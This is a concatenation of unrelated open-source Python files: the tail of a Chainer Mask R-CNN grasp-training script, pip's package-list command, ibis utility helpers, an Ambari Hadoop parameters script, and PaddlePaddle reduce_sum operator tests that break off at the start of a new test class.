osp.join(thisdir, args.pretrained_model), occluded_grasp_mask_rcnn)
if args.finetune:
assert not args.no_grasp
if args.no_grasp:
assert not args.finetune
args.grasp_branch_finetune = args.finetune
args.mask_branch_finetune = args.no_grasp
model = OccludedGraspMaskRCNNTrainChain(
occluded_grasp_mask_rcnn,
grasp_branch_finetune=args.grasp_branch_finetune,
alpha_graspable=args.alpha_graspable,
mask_branch_finetune=args.mask_branch_finetune)
if args.multi_node or args.gpu >= 0:
model.to_gpu()
optimizer = chainer.optimizers.MomentumSGD(momentum=0.9)
if args.multi_node:
optimizer = chainermn.create_multi_node_optimizer(optimizer, comm)
optimizer.setup(model)
optimizer.add_hook(chainer.optimizer.WeightDecay(rate=args.weight_decay))
occluded_grasp_mask_rcnn.extractor.conv1.disable_update()
occluded_grasp_mask_rcnn.extractor.bn1.disable_update()
occluded_grasp_mask_rcnn.extractor.res2.disable_update()
for link in occluded_grasp_mask_rcnn.links():
if isinstance(link, cmr.links.AffineChannel2D):
link.disable_update()
# -------------------------------------------------------------------------
# Transform dataset.
train_data = chainer.datasets.TransformDataset(
train_data, Transform(occluded_grasp_mask_rcnn))
# -------------------------------------------------------------------------
# Iterator.
if args.multi_node:
if comm.rank != 0:
train_data = None
train_data = chainermn.scatter_dataset(train_data, comm, shuffle=True)
# for training
train_iter = chainer.iterators.SerialIterator(train_data, batch_size=1)
# test_iter = chainer.iterators.SerialIterator(
# test_data, batch_size=1, repeat=False, shuffle=False)
# -------------------------------------------------------------------------
if occluded_grasp_mask_rcnn.rotate_angle is None:
converter = functools.partial(
cmr.datasets.concat_examples,
padding=0,
# img, ins_labels, labels, bboxes, sg_masks, dg_masks, scales
indices_concat=[0, 1, 2, 4, 5, 6],
# img, ins_labels, labels, _, sg_masks, dg_masks, scales
indices_to_device=[0, 3], # img, bbox
)
else:
converter = functools.partial(
cmr.datasets.concat_examples,
padding=0,
# img, ins_labels, labels, bboxes,
# sg_masks, dg_masks, scales, rotations
indices_concat=[0, 1, 2, 4, 5, 6, 7],
# img, ins_labels, labels, _,
# sg_masks, dg_masks, scales, rotations
indices_to_device=[0, 3], # img, bbox
)
updater = chainer.training.updater.StandardUpdater(
train_iter, optimizer, device=device,
converter=converter)
trainer = training.Trainer(
updater, (args.max_epoch, 'epoch'), out=args.out)
args.warm_up = not args.no_grasp
def lr_schedule(updater):
warm_up_duration = 500
warm_up_rate = 1 / 3
iteration = updater.iteration
if args.warm_up and iteration < warm_up_duration:
rate = warm_up_rate \
+ (1 - warm_up_rate) * iteration / warm_up_duration
elif iteration < (args.step_size[0] * len(train_data)):
rate = 1
elif iteration < (args.step_size[1] * len(train_data)):
rate = 0.1
else:
rate = 0.01
return args.lr_base * rate
trainer.extend(ManualScheduler('lr', lr_schedule))
# eval_interval = 1, 'epoch'
log_interval = 20, 'iteration'
plot_interval = 0.1, 'epoch'
print_interval = 20, 'iteration'
if not args.multi_node or comm.rank == 0:
# evaluator = InstanceSegmentationVOCEvaluator(
# test_iter, model.occluded_grasp_mask_rcnn, device=device,
# use_07_metric=False, label_names=label_names)
# trainer.extend(evaluator, trigger=eval_interval)
# trainer.extend(
# extensions.snapshot_object(
# model.occluded_grasp_mask_rcnn, 'snapshot_model.npz'),
# trigger=training.triggers.MaxValueTrigger(
# 'validation/main/mpq', eval_interval))
model_name = model.occluded_grasp_mask_rcnn.__class__.__name__
trainer.extend(
chainer.training.extensions.snapshot_object(
model.occluded_grasp_mask_rcnn,
savefun=chainer.serializers.save_npz,
filename='%s_model_iter_{.updater.iteration}.npz'
% model_name),
trigger=(1, 'epoch'))
args.git_hash = cmr.utils.git_hash()
args.hostname = socket.gethostname()
trainer.extend(fcn.extensions.ParamsReport(args.__dict__))
# trainer.extend(
# InstanceSegmentationVisReport(
# test_iter, model.occluded_grasp_mask_rcnn,
# label_names=label_names),
# trigger=eval_interval)
trainer.extend(chainer.training.extensions.observe_lr(),
trigger=log_interval)
trainer.extend(extensions.LogReport(trigger=log_interval))
trainer.extend(extensions.PrintReport(
['iteration', 'epoch', 'elapsed_time', 'lr',
'main/loss',
'main/rpn_loc_loss',
'main/rpn_cls_loss',
'main/roi_loc_loss',
'main/roi_cls_loss',
'main/roi_mask_loss',
'main/roi_sg_mask_loss',
'main/roi_dg_mask_loss',
'validation/main/mpq']),
trigger=print_interval,
)
trainer.extend(extensions.ProgressBar(update_interval=10))
# plot
assert extensions.PlotReport.available()
trainer.extend(
extensions.PlotReport(
['main/loss',
'main/rpn_loc_loss',
'main/rpn_cls_loss',
'main/roi_loc_loss',
'main/roi_cls_loss',
'main/roi_mask_loss',
'main/roi_sg_mask_loss',
'main/roi_dg_mask_loss'],
file_name='loss.png', trigger=plot_interval,
),
trigger=plot_interval,
)
# trainer.extend(
# extensions.PlotReport(
# ['validation/main/map',
# 'validation/main/msq',
# 'validation/main/mdq',
# 'validation/main/mpq'],
# file_name='accuracy.png', trigger=plot_interval
# ),
# trigger=eval_interval,
# )
trainer.extend(extensions.dump_graph('main/loss'))
trainer.run()
if __name__ == '__main__':
main()
|
|
from __future__ import absolute_import
import json
import logging
import warnings
from pip._vendor import six
from pip._vendor.six.moves import zip_longest
from pip._internal.basecommand import Command
from pip._internal.cmdoptions import index_group, make_option_group
from pip._internal.exceptions import CommandError
from pip._internal.index import PackageFinder
from pip._internal.utils.deprecation import RemovedInPip11Warning
from pip._internal.utils.misc import (
dist_is_editable, get_installed_distributions,
)
from pip._internal.utils.packaging import get_installer
logger = logging.getLogger(__name__)
class ListCommand(Command):
"""
List installed packages, including editables.
Packages are listed in a case-insensitive sorted order.
"""
name = 'list'
usage = """
%prog [options]"""
summary = 'List installed packages.'
def __init__(self, *args, **kw):
super(ListCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(
'-o', '--outdated',
action='store_true',
default=False,
help='List outdated packages')
cmd_opts.add_option(
'-u', '--uptodate',
action='store_true',
default=False,
help='List uptodate packages')
cmd_opts.add_option(
'-e', '--editable',
action='store_true',
default=False,
help='List editable projects.')
cmd_opts.add_option(
'-l', '--local',
action='store_true',
default=False,
help=('If in a virtualenv that has global access, do not list '
'globally-installed packages.'),
)
self.cmd_opts.add_option(
'--user',
dest='user',
action='store_true',
default=False,
help='Only output packages installed in user-site.')
cmd_opts.add_option(
'--pre',
action='store_true',
default=False,
help=("Include pre-release and development versions. By default, "
"pip only finds stable versions."),
)
cmd_opts.add_option(
'--format',
action='store',
dest='list_format',
default="columns",
choices=('legacy', 'columns', 'freeze', 'json'),
help="Select the output format among: columns (default), freeze, "
"json, or legacy.",
)
cmd_opts.add_option(
'--not-required',
action='store_true',
dest='not_required',
help="List packages that are not dependencies of "
"installed packages.",
)
cmd_opts.add_option(
'--exclude-editable',
action='store_false',
dest='include_editable',
help='Exclude editable package from output.',
)
cmd_opts.add_option(
'--include-editable',
action='store_true',
dest='include_editable',
help='Include editable package from output.',
default=True,
)
index_opts = make_option_group(index_group, self.parser)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def _build_package_finder(self, options, index_urls, session):
"""
Create a package finder appropriate to this list command.
"""
return PackageFinder(
find_links=options.find_links,
index_urls=index_urls,
allow_all_prereleases=options.pre,
trusted_hosts=options.trusted_hosts,
process_dependency_links=options.process_dependency_links,
session=session,
)
def run(self, options, args):
if options.list_format == "legacy":
warnings.warn(
"The legacy format has been deprecated and will be removed "
"in the future.",
RemovedInPip11Warning,
)
if options.outdated and options.uptodate:
raise CommandError(
"Options --outdated and --uptodate cannot be combined.")
packages = get_installed_distributions(
local_only=options.local,
user_only=options.user,
editables_only=options.editable,
include_editables=options.include_editable,
)
if options.outdated:
packages = self.get_outdated(packages, options)
elif options.uptodate:
packages = self.get_uptodate(packages, options)
if options.not_required:
packages = self.get_not_required(packages, options)
self.output_package_listing(packages, options)
def get_outdated(self, packages, options):
return [
dist for dist in self.iter_packages_latest_infos(packages, options)
if dist.latest_version > dist.parsed_version
]
def get_uptodate(self, packages, options):
return [
dist for dist in self.iter_packages_latest_infos(packages, options)
if dist.latest_version == dist.parsed_version
]
def get_not_required(self, packages, options):
dep_keys = set()
for dist in packages:
dep_keys.update(requirement.key for requirement in dist.requires())
return {pkg for pkg in packages if pkg.key not in dep_keys}
def iter_packages_latest_infos(self, packages, options):
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.debug('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
dependency_links = []
for dist in packages:
if dist.has_metadata('dependency_links.txt'):
dependency_links.extend(
dist.get_metadata_lines('dependency_links.txt'),
)
with self._build_session(options) as session:
finder = self._build_package_finder(options, index_urls, session)
finder.add_dependency_links(dependency_links)
for dist in packages:
typ = 'unknown'
all_candidates = finder.find_all_candidates(dist.key)
if not options.pre:
# Remove prereleases
all_candidates = [candidate for candidate in all_candidates
if not candidate.version.is_prerelease]
if not all_candidates:
continue
best_candidate = max(all_candidates,
key=finder._candidate_sort_key)
remote_version = best_candidate.version
if best_candidate.location.is_wheel:
typ = 'wheel'
else:
typ = 'sdist'
# This is dirty but makes the rest of the code much cleaner
dist.latest_version = remote_version
dist.latest_filetype = typ
yield dist
def output_legacy(self, dist, options):
if options.verbose >= 1:
return '%s (%s, %s, %s)' % (
dist.project_name,
dist.version,
dist.location,
get_installer(dist),
)
elif dist_is_editable(dist):
return '%s (%s, %s)' % (
dist.project_name,
dist.version,
dist.location,
)
else:
return '%s (%s)' % (dist.project_name, dist.version)
def output_legacy_latest(self, dist, options):
return '%s - Latest: %s [%s]' % (
self.output_legacy(dist, options),
dist.latest_version,
dist.latest_filetype,
)
def output_package_listing(self, packages, options):
packages = sorted(
packages,
key=lambda dist: dist.project_name.lower(),
)
if options.list_format == 'columns' and packages:
data, header = format_for_columns(packages, options)
self.output_package_listing_columns(data, header)
elif options.list_format == 'freeze':
for dist in packages:
if options.verbose >= 1:
logger.info("%s==%s (%s)", dist.project_name,
dist.version, dist.location)
else:
logger.info("%s==%s", dist.project_name, dist.version)
elif options.list_format == 'json':
logger.info(format_for_json(packages, options))
elif options.list_format == "legacy":
for dist in packages:
if options.outdated:
logger.info(self.output_legacy_latest(dist, options))
else:
logger.info(self.output_legacy(dist, options))
def output_package_listing_columns(self, data, header):
# insert the header first: we need to know the size of column names
if len(data) > 0:
data.insert(0, header)
pkg_strings, sizes = tabulate(data)
# Create and add a separator.
if len(data) > 0:
pkg_strings.insert(1, " ".join(map(lambda x: '-' * x, sizes)))
for val in pkg_strings:
logger.info(val)
def tabulate(vals):
# From pfmoore on GitHub:
# https://github.com/pypa/pip/issues/3651#issuecomment-216932564
assert len(vals) > 0
sizes = [0] * max(len(x) for x in vals)
for row in vals:
sizes = [max(s, len(str(c))) for s, c in zip_longest(sizes, row)]
result = []
for row in vals:
display = " ".join([str(c).ljust(s) if c is not None else ''
for s, c in zip_longest(sizes, row)])
result.append(display)
return result, sizes
def format_for_columns(pkgs, options):
"""
Convert the package data into something usable
by output_package_listing_columns.
"""
running_outdated = options.outdated
# Adjust the header for the `pip list --outdated` case.
if running_outdated:
header = ["Package", "Version", "Latest", "Type"]
else:
header = ["Package", "Version"]
data = []
if options.verbose >= 1 or any(dist_is_editable(x) for x in pkgs):
header.append("Location")
if options.verbose >= 1:
header.append("Installer")
for proj in pkgs:
# if we're working on the 'outdated' list, separate out the
# latest_version and type
row = [proj.project_name, proj.version]
if running_outdated:
row.append(proj.latest_version)
row.append(proj.latest_filetype)
if options.verbose >= 1 or dist_is_editable(proj):
row.append(proj.location)
if options.verbose >= 1:
row.append(get_installer(proj))
data.append(row)
return data, header
def format_for_json(packages, options):
data = []
for dist in packages:
info = {
'name': dist.project_name,
'version': six.text_type(dist.version),
}
if options.verbose >= 1:
info['location'] = dist.location
info['installer'] = get_installer(dist)
if options.outdated:
info['latest_version'] = six.text_type(dist.latest_version)
info['latest_filetype'] = dist.latest_filetype
data.append(info)
return json.dumps(data)
|
|
from __future__ import print_function
import collections
import functools
import logging
import operator
import os
import types
import six
import toolz
import ibis.compat as compat
from ibis.config import options
def guid():
try:
from ibis.comms import uuid4_hex
return uuid4_hex()
except ImportError:
from uuid import uuid4
guid = uuid4()
return guid.hex if not compat.PY2 else guid.get_hex()
def indent(text, spaces):
prefix = ' ' * spaces
return ''.join(prefix + line for line in text.splitlines(True))
def is_one_of(values, t):
return (isinstance(x, t) for x in values)
any_of = toolz.compose(any, is_one_of)
all_of = toolz.compose(all, is_one_of)
def promote_list(val):
if not isinstance(val, list):
val = [val]
return val
class IbisSet(object):
def __init__(self, keys=None):
self.keys = keys or []
@classmethod
def from_list(cls, keys):
return IbisSet(keys)
def __contains__(self, obj):
for other in self.keys:
if obj.equals(other):
return True
return False
def add(self, obj):
self.keys.append(obj)
class IbisMap(object):
def __init__(self):
self.keys = []
self.values = []
def __contains__(self, obj):
for other in self.keys:
if obj.equals(other):
return True
return False
def set(self, key, value):
self.keys.append(key)
self.values.append(value)
def get(self, key):
for k, v in zip(self.keys, self.values):
if key.equals(k):
return v
raise KeyError(key)
def is_function(v):
return isinstance(v, (types.FunctionType, types.LambdaType))
def adjoin(space, *lists):
"""
Glues together two sets of strings using the amount of space requested.
The idea is to prettify.
Brought over from from pandas
"""
out_lines = []
newLists = []
lengths = [max(map(len, x)) + space for x in lists[:-1]]
# not the last one
lengths.append(max(map(len, lists[-1])))
maxLen = max(map(len, lists))
for i, lst in enumerate(lists):
nl = [x.ljust(lengths[i]) for x in lst]
nl.extend([' ' * lengths[i]] * (maxLen - len(lst)))
newLists.append(nl)
toJoin = zip(*newLists)
for lines in toJoin:
out_lines.append(_join_unicode(lines))
return _join_unicode(out_lines, sep='\n')
def _join_unicode(lines, sep=''):
try:
return sep.join(lines)
except UnicodeDecodeError:
sep = compat.unicode_type(sep)
return sep.join([x.decode('utf-8') if isinstance(x, str) else x
for x in lines])
def log(msg):
if options.verbose:
(options.verbose_log or print)(msg)
def approx_equal(a, b, eps):
"""Return whether the difference between `a` and `b` is less than `eps`.
Parameters
----------
a : numbers.Real
b : numbers.Real
eps : numbers.Real
Returns
-------
are_diff : bool
"""
assert abs(a - b) < eps
def implements(f):
# TODO: is this any different from functools.wraps?
def decorator(g):
g.__doc__ = f.__doc__
return g
return decorator
def safe_index(elements, value):
"""Find the location of `value` in `elements`, return -1 if `value` is
not found instead of raising ``ValueError``.
Parameters
----------
elements : Sequence
value : object
Returns
-------
location : object
Examples
--------
>>> sequence = [1, 2, 3]
>>> safe_index(sequence, 2)
1
>>> safe_index(sequence, 4)
-1
"""
try:
return elements.index(value)
except ValueError:
return -1
def is_iterable(o):
"""Return whether `o` is a non-string iterable.
Parameters
----------
o : object
Any python object
Returns
-------
is_seq : bool
Examples
--------
>>> x = '1'
>>> is_iterable(x)
False
>>> is_iterable(iter(x))
True
>>> is_iterable(i for i in range(1))
True
>>> is_iterable(1)
False
>>> is_iterable([])
True
"""
return (not isinstance(o, six.string_types) and
isinstance(o, collections.Iterable))
def convert_unit(value, unit, to):
"""Convert `value`--which is assumed to be in units of `unit`--to units of
`to`.
Parameters
----------
value : Union[numbers.Real, ibis.expr.types.NumericValue]
Returns
-------
result : Union[numbers.Integral, ibis.expr.types.NumericValue]
Examples
--------
>>> one_second = 1000
>>> x = convert_unit(one_second, 'ms', 's')
>>> x
1
>>> one_second = 1
>>> x = convert_unit(one_second, 's', 'ms')
>>> x
1000
>>> x = convert_unit(one_second, 's', 's')
>>> x
1
>>> x = convert_unit(one_second, 's', 'M')
Traceback (most recent call last):
...
ValueError: Cannot convert to or from variable length interval
"""
# Don't do anything if from and to units are equivalent
if unit == to:
return value
units = ('W', 'D', 'h', 'm', 's', 'ms', 'us', 'ns')
factors = (7, 24, 60, 60, 1000, 1000, 1000)
monthly_units = ('Y', 'Q', 'M')
monthly_factors = (4, 3)
try:
i, j = units.index(unit), units.index(to)
except ValueError:
try:
i, j = monthly_units.index(unit), monthly_units.index(to)
factors = monthly_factors
except ValueError:
raise ValueError(
'Cannot convert to or from variable length interval'
)
factor = functools.reduce(operator.mul, factors[min(i, j):max(i, j)], 1)
assert factor > 1
if i < j:
return value * factor
assert i > j
return value // factor
def get_logger(name, level=None, format=None, propagate=False):
logging.basicConfig()
handler = logging.StreamHandler()
if format is None:
format = (
'%(relativeCreated)6d '
'%(name)-20s '
'%(levelname)-8s '
'%(threadName)-25s '
'%(message)s'
)
handler.setFormatter(logging.Formatter(fmt=format))
logger = logging.getLogger(name)
logger.propagate = propagate
logger.setLevel(
level or getattr(
logging, os.environ.get('LOGLEVEL', 'WARNING').upper()))
logger.addHandler(handler)
return logger
|
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import collections
import re
import os
import ambari_simplejson as json # simplejson is much faster comparing to Python 2.6 json module and has the same functions set.
from resource_management.libraries.script import Script
from resource_management.libraries.functions import default
from resource_management.libraries.functions import format
from resource_management.libraries.functions import conf_select
from resource_management.libraries.functions import stack_select
from resource_management.libraries.functions import format_jvm_option
from resource_management.libraries.functions.is_empty import is_empty
from resource_management.libraries.functions.version import format_stack_version
from resource_management.libraries.functions.version import compare_versions
from resource_management.libraries.functions.expect import expect
from ambari_commons.os_check import OSCheck
from ambari_commons.constants import AMBARI_SUDO_BINARY
config = Script.get_config()
tmp_dir = Script.get_tmp_dir()
dfs_type = default("/commandParams/dfs_type", "")
artifact_dir = format("{tmp_dir}/AMBARI-artifacts/")
jdk_name = default("/hostLevelParams/jdk_name", None)
java_home = config['hostLevelParams']['java_home']
java_version = expect("/hostLevelParams/java_version", int)
jdk_location = config['hostLevelParams']['jdk_location']
sudo = AMBARI_SUDO_BINARY
ambari_server_hostname = config['clusterHostInfo']['ambari_server_host'][0]
stack_version_unformatted = config['hostLevelParams']['stack_version']
stack_version_formatted = format_stack_version(stack_version_unformatted)
restart_type = default("/commandParams/restart_type", "")
version = default("/commandParams/version", None)
# Handle upgrade and downgrade
if (restart_type.lower() == "rolling_upgrade" or restart_type.lower() == "nonrolling_upgrade") and version:
stack_version_formatted = format_stack_version(version)
security_enabled = config['configurations']['cluster-env']['security_enabled']
hdfs_user = config['configurations']['hadoop-env']['hdfs_user']
# Some datanode settings
dfs_dn_addr = default('/configurations/hdfs-site/dfs.datanode.address', None)
dfs_dn_http_addr = default('/configurations/hdfs-site/dfs.datanode.http.address', None)
dfs_dn_https_addr = default('/configurations/hdfs-site/dfs.datanode.https.address', None)
dfs_http_policy = default('/configurations/hdfs-site/dfs.http.policy', None)
secure_dn_ports_are_in_use = False
def get_port(address):
"""
Extracts port from the address like 0.0.0.0:1019
"""
if address is None:
return None
m = re.search(r'(?:http(?:s)?://)?([\w\d.]*):(\d{1,5})', address)
if m is not None:
return int(m.group(2))
else:
return None
def is_secure_port(port):
"""
Returns True if port is root-owned at *nix systems
"""
if port is not None:
return port < 1024
else:
return False
# hadoop default params
mapreduce_libs_path = "/usr/lib/hadoop-mapreduce/*"
# upgrades would cause these directories to have a version instead of "current"
# which would cause a lot of problems when writing out hadoop-env.sh; instead
# force the use of "current" in the hook
hadoop_home = stack_select.get_hadoop_dir("home", force_latest_on_upgrade=True)
hadoop_libexec_dir = stack_select.get_hadoop_dir("libexec", force_latest_on_upgrade=True)
hadoop_conf_empty_dir = "/etc/hadoop/conf.empty"
hadoop_secure_dn_user = hdfs_user
hadoop_dir = "/etc/hadoop"
versioned_stack_root = '/usr/iop/current'
hadoop_java_io_tmpdir = os.path.join(tmp_dir, "hadoop_java_io_tmpdir")
datanode_max_locked_memory = config['configurations']['hdfs-site']['dfs.datanode.max.locked.memory']
is_datanode_max_locked_memory_set = not is_empty(config['configurations']['hdfs-site']['dfs.datanode.max.locked.memory'])
# IOP 4.0+ params
if Script.is_stack_greater_or_equal("4.0"):
mapreduce_libs_path = "/usr/iop/current/hadoop-mapreduce-client/*"
# not supported in IOP 4.0+
hadoop_conf_empty_dir = None
if not security_enabled:
hadoop_secure_dn_user = '""'
else:
dfs_dn_port = get_port(dfs_dn_addr)
dfs_dn_http_port = get_port(dfs_dn_http_addr)
dfs_dn_https_port = get_port(dfs_dn_https_addr)
# We try to avoid inability to start datanode as a plain user due to usage of root-owned ports
if dfs_http_policy == "HTTPS_ONLY":
secure_dn_ports_are_in_use = is_secure_port(dfs_dn_port) or is_secure_port(dfs_dn_https_port)
elif dfs_http_policy == "HTTP_AND_HTTPS":
secure_dn_ports_are_in_use = is_secure_port(dfs_dn_port) or is_secure_port(dfs_dn_http_port) or is_secure_port(dfs_dn_https_port)
else: # params.dfs_http_policy == "HTTP_ONLY" or not defined:
secure_dn_ports_are_in_use = is_secure_port(dfs_dn_port) or is_secure_port(dfs_dn_http_port)
if secure_dn_ports_are_in_use:
hadoop_secure_dn_user = hdfs_user
else:
hadoop_secure_dn_user = '""'
#hadoop params
hdfs_log_dir_prefix = config['configurations']['hadoop-env']['hdfs_log_dir_prefix']
hadoop_pid_dir_prefix = config['configurations']['hadoop-env']['hadoop_pid_dir_prefix']
hadoop_root_logger = config['configurations']['hadoop-env']['hadoop_root_logger']
jsvc_path = "/usr/lib/bigtop-utils"
hadoop_heapsize = config['configurations']['hadoop-env']['hadoop_heapsize']
namenode_heapsize = config['configurations']['hadoop-env']['namenode_heapsize']
namenode_opt_newsize = config['configurations']['hadoop-env']['namenode_opt_newsize']
namenode_opt_maxnewsize = config['configurations']['hadoop-env']['namenode_opt_maxnewsize']
namenode_opt_permsize = format_jvm_option("/configurations/hadoop-env/namenode_opt_permsize","128m")
namenode_opt_maxpermsize = format_jvm_option("/configurations/hadoop-env/namenode_opt_maxpermsize","256m")
jtnode_opt_newsize = "200m"
jtnode_opt_maxnewsize = "200m"
jtnode_heapsize = "1024m"
ttnode_heapsize = "1024m"
dtnode_heapsize = config['configurations']['hadoop-env']['dtnode_heapsize']
nfsgateway_heapsize = config['configurations']['hadoop-env']['nfsgateway_heapsize']
mapred_pid_dir_prefix = default("/configurations/mapred-env/mapred_pid_dir_prefix","/var/run/hadoop-mapreduce")
mapred_log_dir_prefix = default("/configurations/mapred-env/mapred_log_dir_prefix","/var/log/hadoop-mapreduce")
hadoop_env_sh_template = config['configurations']['hadoop-env']['content']
#users and groups
hbase_user = config['configurations']['hbase-env']['hbase_user']
smoke_user = config['configurations']['cluster-env']['smokeuser']
gmetad_user = config['configurations']['ganglia-env']["gmetad_user"]
gmond_user = config['configurations']['ganglia-env']["gmond_user"]
tez_user = config['configurations']['tez-env']["tez_user"]
oozie_user = config['configurations']['oozie-env']["oozie_user"]
falcon_user = config['configurations']['falcon-env']["falcon_user"]
ranger_user = config['configurations']['ranger-env']["ranger_user"]
user_group = config['configurations']['cluster-env']['user_group']
ganglia_server_hosts = default("/clusterHostInfo/ganglia_server_host", [])
namenode_host = default("/clusterHostInfo/namenode_host", [])
hbase_master_hosts = default("/clusterHostInfo/hbase_master_hosts", [])
oozie_servers = default("/clusterHostInfo/oozie_server", [])
falcon_server_hosts = default("/clusterHostInfo/falcon_server_hosts", [])
ranger_admin_hosts = default("/clusterHostInfo/ranger_admin_hosts", [])
has_namenode = not len(namenode_host) == 0
has_ganglia_server = not len(ganglia_server_hosts) == 0
has_tez = 'tez-site' in config['configurations']
has_hbase_masters = not len(hbase_master_hosts) == 0
has_oozie_server = not len(oozie_servers) == 0
has_falcon_server_hosts = not len(falcon_server_hosts) == 0
has_ranger_admin = not len(ranger_admin_hosts) == 0
if has_namenode or dfs_type == 'HCFS':
hadoop_conf_dir = conf_select.get_hadoop_conf_dir(force_latest_on_upgrade=True)
hbase_tmp_dir = "/tmp/hbase-hbase"
proxyuser_group = default("/configurations/hadoop-env/proxyuser_group","users")
ranger_group = config['configurations']['ranger-env']['ranger_group']
dfs_cluster_administrators_group = config['configurations']['hdfs-site']["dfs.cluster.administrators"]
ignore_groupsusers_create = default("/configurations/cluster-env/ignore_groupsusers_create", False)
fetch_nonlocal_groups = config['configurations']['cluster-env']["fetch_nonlocal_groups"]
smoke_user_dirs = format("/tmp/hadoop-{smoke_user},/tmp/hsperfdata_{smoke_user},/home/{smoke_user},/tmp/{smoke_user},/tmp/sqoop-{smoke_user}")
if has_hbase_masters:
hbase_user_dirs = format("/home/{hbase_user},/tmp/{hbase_user},/usr/bin/{hbase_user},/var/log/{hbase_user},{hbase_tmp_dir}")
#repo params
repo_info = config['hostLevelParams']['repo_info']
service_repo_info = default("/hostLevelParams/service_repo_info",None)
user_to_groups_dict = collections.defaultdict(lambda:[user_group])
user_to_groups_dict[smoke_user] = [proxyuser_group]
if has_ganglia_server:
user_to_groups_dict[gmond_user] = [gmond_user]
user_to_groups_dict[gmetad_user] = [gmetad_user]
if has_tez:
user_to_groups_dict[tez_user] = [proxyuser_group]
if has_oozie_server:
user_to_groups_dict[oozie_user] = [proxyuser_group]
if has_falcon_server_hosts:
user_to_groups_dict[falcon_user] = [proxyuser_group]
if has_ranger_admin:
user_to_groups_dict[ranger_user] = [ranger_group]
user_to_gid_dict = collections.defaultdict(lambda:user_group)
user_list = json.loads(config['hostLevelParams']['user_list'])
group_list = json.loads(config['hostLevelParams']['group_list'])
host_sys_prepped = default("/hostLevelParams/host_sys_prepped", False)
if has_tez:
tez_am_view_acls = config['configurations']['tez-site']["tez.am.view-acls"]
override_uid = str(default("/configurations/cluster-env/override_uid", "true")).lower()
##### Custom extensions ######
#Hadoop custom extensions
hadoop_custom_extensions_enabled = default("/configurations/core-site/hadoop.custom-extensions.enabled", False)
hadoop_custom_extensions_services = default("/configurations/core-site/hadoop.custom-extensions.services", "")
hadoop_custom_extensions_owner = default("/configurations/core-site/hadoop.custom-extensions.owner", hdfs_user)
hadoop_custom_extensions_services = [ service.strip().upper() for service in hadoop_custom_extensions_services.split(",") ]
hadoop_custom_extensions_services.append("YARN")
hadoop_custom_extensions_hdfs_dir = "/iop/ext/{0}/hadoop".format(stack_version_formatted)
hadoop_custom_extensions_local_dir = "{0}/current/ext/hadoop".format(Script.get_stack_root())
|
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest, skip_check_grad_ci
import paddle
import paddle.fluid.core as core
import paddle.fluid as fluid
from paddle.fluid import compiler, Program, program_guard
from paddle.fluid.framework import convert_np_dtype_to_dtype_
class TestSumOp(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestSumOp_fp16(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
'X': np.random.uniform(0, 0.1, (5, 6, 10)).astype("float16")
}
self.attrs = {'dim': [0, 1, 2]}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
self.gradient = self.calc_gradient()
def test_check_output(self):
self.check_output()
def calc_gradient(self):
x = self.inputs["X"]
grad = np.ones(x.shape, dtype=x.dtype)
return grad,
def test_check_grad(self):
self.check_grad(['X'], 'Out', user_defined_grads=self.gradient)
class TestSumOp_fp16_withInt(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
# ref to https://en.wikipedia.org/wiki/Half-precision_floating-point_format
# Precision limitations on integer values between 0 and 2048 can be exactly represented
'X': np.random.randint(0, 30, (10, 10)).astype("float16")
}
self.attrs = {'dim': [0, 1]}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
self.gradient = self.calc_gradient()
def test_check_output(self):
self.check_output()
def calc_gradient(self):
x = self.inputs["X"]
grad = np.ones(x.shape, dtype=x.dtype)
return grad,
def test_check_grad(self):
self.check_grad(['X'], 'Out', user_defined_grads=self.gradient)
class TestSumOp5D(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
'X': np.random.random((1, 2, 5, 6, 10)).astype("float64")
}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestSumOp6D(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
'X': np.random.random((1, 1, 2, 5, 6, 10)).astype("float64")
}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestSumOp8D(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
'X': np.random.random((1, 3, 1, 2, 1, 4, 3, 10)).astype("float64")
}
self.attrs = {'dim': (0, 3)}
self.outputs = {'Out': self.inputs['X'].sum(axis=(0, 3))}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
@skip_check_grad_ci(
reason="reduce_max is discontinuous non-derivable function,"
" its gradient check is not supported by unittest framework.")
class TestMaxOp(OpTest):
